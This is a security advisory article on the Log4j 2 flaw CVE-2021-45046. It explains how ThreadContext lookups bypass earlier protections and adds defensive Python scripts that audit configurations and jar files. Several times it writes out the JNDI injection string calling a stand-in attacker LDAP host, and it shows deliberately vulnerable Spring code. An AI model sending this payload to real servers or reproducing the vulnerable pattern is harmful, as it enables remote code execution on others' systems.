A new attack on Log4j 2 that bypasses the additional protections

A vulnerability has been identified in the JNDI substitution (lookup) implementation of the Log4j 2 library (CVE-2021-45046). It is present despite the fixes added in release 2.15 and regardless of whether the protective "log4j2.formatMsgNoLookups" setting is enabled. The issue is especially dangerous for older versions of Log4j 2 that were protected only with the "formatMsgNoLookups" flag, because it bypasses that protection against the earlier vulnerability (Log4Shell, CVE-2021-44228) and therefore allows code execution on the server. For users of version 2.15, exploitation is limited to crashing the application through resource exhaustion.

The vulnerability affects only configurations that use a Context Lookup such as ${ctx:loginId}, or a Thread Context Map pattern such as %X, %mdc or %MDC, in the logging layout. Exploitation comes down to getting data containing a JNDI substitution written to the log through a context lookup or MDC pattern, in an application whose log output formatting rules reference that context value.

Researchers from LunaSec noted that for Log4j versions below 2.15 this vulnerability can serve as a new vector for the Log4Shell attack leading to code execution, if ThreadContext expressions that receive external data are used when writing to the log, regardless of whether the protective "formatMsgNoLookups" flag or the "%m{nolookups}" pattern is enabled.


The bypass of the protection comes down to the fact that, instead of substituting "${jndi:ldap://attacker.com/a}" directly into the message, the expression is injected through an intermediate variable that is referenced in the log output formatting rules. For example, if the context lookup ${ctx:apiversion} is used when formatting log output, the attack can be carried out by placing the string "${jndi:ldap://attacker.com/a}" into the value that is written to that variable. Example of vulnerable configuration and code (the original's Java snippet, with the missing parameter type, logger declaration and imports added):

    appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    import org.apache.logging.log4j.ThreadContext;
    import org.springframework.web.bind.annotation.GetMapping;
    import org.springframework.web.bind.annotation.RequestHeader;

    private static final Logger logger = LogManager.getLogger();

    @GetMapping("/")
    public String index(@RequestHeader("X-Api-Version") String apiVersion) {
        // The value of the "X-Api-Version" HTTP header is stored in the ThreadContext under "apiversion"
        ThreadContext.put("apiversion", apiVersion);
        // When the event is formatted, the layout's ${ctx:apiversion} resolves to this external value,
        // and the substitutor then expands any ${jndi:...} it contains
        logger.info("Received a request for API version");
        return "Hello, world!";
    }
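The following script is an added example, not code from the original article or from the Log4j project. It audits Log4j 2 layout patterns, in properties and XML form, for the two preconditions named above: a Context Lookup (${ctx:...}) or a Thread Context Map converter (%X, %mdc, %MDC) in the pattern. It also shows that %m{nolookups} in the same pattern does not cover those fields. The sample configurations are constructed for the demonstration, modelled on the vulnerable pattern above; contains_lookup is a coarse pre-filter for attacker-supplied values carrying lookup syntax, not a complete detection.

```python
"""Audit Log4j 2 PatternLayout patterns for the CVE-2021-45046 preconditions.

Added example, not code from the original article or from the Log4j project.
It flags layout patterns that resolve attacker-reachable ThreadContext data at
format time: Context Lookups (${ctx:...}) and the Thread Context Map converters
(%X, %mdc, %MDC). The sample configurations below are constructed for the demo.
"""
import re
from dataclasses import dataclass

# ${ctx:name} in a config, or the $${ctx:name} form that defers resolution to runtime
CONTEXT_LOOKUP = re.compile(r"\$\$?\{ctx:")
# %X, %mdc or %MDC conversion patterns; case-sensitive, so %x (the NDC pattern) is not matched
MDC_CONVERTER = re.compile(r"%(?:X|mdc|MDC)(?![A-Za-z])")
# %m{nolookups}: protects only the message text, not the fields above
MSG_NOLOOKUPS = re.compile(r"%m(?:sg|essage)?\{nolookups\}")
XML_PATTERN_LAYOUT = re.compile(r'<PatternLayout\b[^>]*\bpattern\s*=\s*"([^"]*)"', re.I)


@dataclass
class Finding:
    source: str        # properties key or XML element label
    pattern: str
    reasons: list


def layout_patterns_from_properties(text):
    """Yield (key, pattern) for every '*.pattern' key in a log4j2.properties file."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip().endswith(".pattern"):
            yield key.strip(), value.strip()


def layout_patterns_from_xml(text):
    """Yield (label, pattern) for every <PatternLayout pattern="..."> in a log4j2.xml file."""
    for n, m in enumerate(XML_PATTERN_LAYOUT.finditer(text), 1):
        yield f"PatternLayout#{n}", m.group(1)


def audit(patterns):
    """Return a Finding for each pattern that matches one of the preconditions."""
    findings = []
    for source, pattern in patterns:
        reasons = []
        if CONTEXT_LOOKUP.search(pattern):
            reasons.append("Context Lookup ${ctx:...} is resolved when the event is formatted")
        if MDC_CONVERTER.search(pattern):
            reasons.append("Thread Context Map converter (%X, %mdc or %MDC) is used")
        if reasons and MSG_NOLOOKUPS.search(pattern):
            reasons.append("%m{nolookups} covers only the message, not these fields")
        if reasons:
            findings.append(Finding(source, pattern, reasons))
    return findings


def contains_lookup(value):
    """Coarse pre-filter for values bound to ThreadContext: any ${...} lookup syntax."""
    return "${" in value


# Constructed samples: the first mirrors the vulnerable pattern discussed above and
# keeps %m{nolookups} to show that it does not help; %x in the XML is the NDC pattern.
SAMPLE_PROPERTIES = """\
appender.console.type = Console
appender.console.name = STDOUT
appender.console.layout.type = PatternLayout
appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m{nolookups}%n
appender.file.layout.pattern = %d %-5p %c - %m%n
"""

SAMPLE_XML = """\
<Configuration>
  <Appenders>
    <Console name="STDOUT">
      <PatternLayout pattern="%d %X{loginId} %-5p %m%n"/>
    </Console>
    <File name="APP" fileName="app.log">
      <PatternLayout pattern="%d %-5p %x %m%n"/>
    </File>
  </Appenders>
</Configuration>
"""

if __name__ == "__main__":
    findings = audit(layout_patterns_from_properties(SAMPLE_PROPERTIES))
    findings += audit(layout_patterns_from_xml(SAMPLE_XML))
    for finding in findings:
        print(f"{finding.source}: {finding.pattern}")
        for reason in finding.reasons:
            print(f"  - {reason}")
    print("header value flagged:", contains_lookup("${jndi:ldap://attacker.com/a}"))
```

Run it against the real log4j2.properties or log4j2.xml files of each deployed application; every flagged appender is one where data bound to ThreadContext from request headers, parameters or user names reaches the substitutor regardless of the message-level protections.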

In Log4j 2.15, the vulnerability can be used for DoS attacks when a value is passed into the Context Lookup that sends the output formatting process into a loop. Apache later revised its assessment of CVE-2021-45046 after the "localhost" restriction in 2.15 was shown to be bypassable in some environments, so 2.15 should not be treated as a complete fix.


Updates 2.16 and 2.12.2 have been published to block the vulnerability. In the Log4j 2.16 branch, in addition to the fixes implemented in version 2.15 and the restriction of JNDI LDAP requests to "localhost", JNDI functionality is now completely disabled by default and support for lookup substitution in messages has been removed. As a workaround, it is recommended to remove the JndiLookup class from the classpath (for example, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class"). Note that the workaround has to be applied to every copy of log4j-core, including copies bundled inside application archives.
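As an added example (not code from the original article or from the Log4j project), the following Python script assesses a log4j-core jar against the fixes described above: it reads the version from the jar's manifest, compares it with the fixed releases the text names (2.16 for the main branch, 2.12.2 for the 2.12 branch), and checks whether the JndiLookup class is still present. It assumes the jar's META-INF/MANIFEST.MF carries an Implementation-Version entry, as published log4j-core jars do, and falls back to the version in the file name; the in-memory sample jars are constructed for the demonstration and contain only a manifest and a stub class entry.

```python
"""Assess a log4j-core jar for the fixes and workaround described above.

Added example, not code from the original article or the Log4j project.
Verdicts: "fixed" (release at or above the fixed version for its branch),
"mitigated" (older release, but JndiLookup.class removed from the jar),
"vulnerable" (older release with JndiLookup.class still present).
"""
import io
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_MAIN = (2, 16, 0)                  # first fixed release named in the text
FIXED_BY_BRANCH = {(2, 12): (2, 12, 2)}  # 2.12.x backport named in the text


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a missing patch component counts as 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return tuple(int(x or 0) for x in m.groups())


def version_from_manifest(zf):
    """Read Implementation-Version from META-INF/MANIFEST.MF, if present."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
    return parse_version(m.group(1)) if m else None


def version_from_name(name):
    """Fallback: version embedded in a file name such as log4j-core-2.13.3.jar."""
    m = re.search(r"log4j-core-(\d+(?:\.\d+)+)\.jar$", name or "")
    return parse_version(m.group(1)) if m else None


def is_fixed(version):
    """True for 2.12.2+ on the 2.12 branch and 2.16.0+ otherwise; unknown versions count as unfixed."""
    if version is None or version[0] != 2:
        return False
    return version >= FIXED_BY_BRANCH.get(version[:2], FIXED_MAIN)


def assess(jar, name=None):
    """jar: path or file-like object. Returns version, JndiLookup presence and the verdict."""
    name = name or (jar if isinstance(jar, str) else getattr(jar, "name", ""))
    with zipfile.ZipFile(jar) as zf:
        version = version_from_manifest(zf) or version_from_name(name)
        jndi_present = JNDI_LOOKUP_CLASS in zf.namelist()
    if is_fixed(version):
        status = "fixed"
    elif not jndi_present:
        status = "mitigated"   # class removed, the workaround described in the text
    else:
        status = "vulnerable"
    return {"version": version, "jndi_lookup_present": jndi_present, "status": status}


def build_sample_jar(version, include_jndi_lookup=True):
    """Constructed in-memory jar for the demo: a manifest plus an optional stub class entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # stub, not real bytecode
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for ver, keep in [("2.14.1", True), ("2.14.1", False), ("2.15.0", True),
                      ("2.12.1", True), ("2.12.2", True), ("2.16.0", True)]:
        result = assess(build_sample_jar(ver, keep))
        print(ver, "JndiLookup kept" if keep else "JndiLookup removed", "->", result["status"])
```

To use it on real files, call assess("path/to/log4j-core-2.14.1.jar"); jars nested inside WAR or fat-jar archives must be extracted first, since a stripped top-level copy says nothing about the bundled ones.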

You can track the appearance of fixes in packages on the distribution pages (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) and at Java platform vendors (GitHub, Docker, Oracle, VMware, Broadcom, Amazon / AWS, Juniper, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure and others).

source: budenet.ru
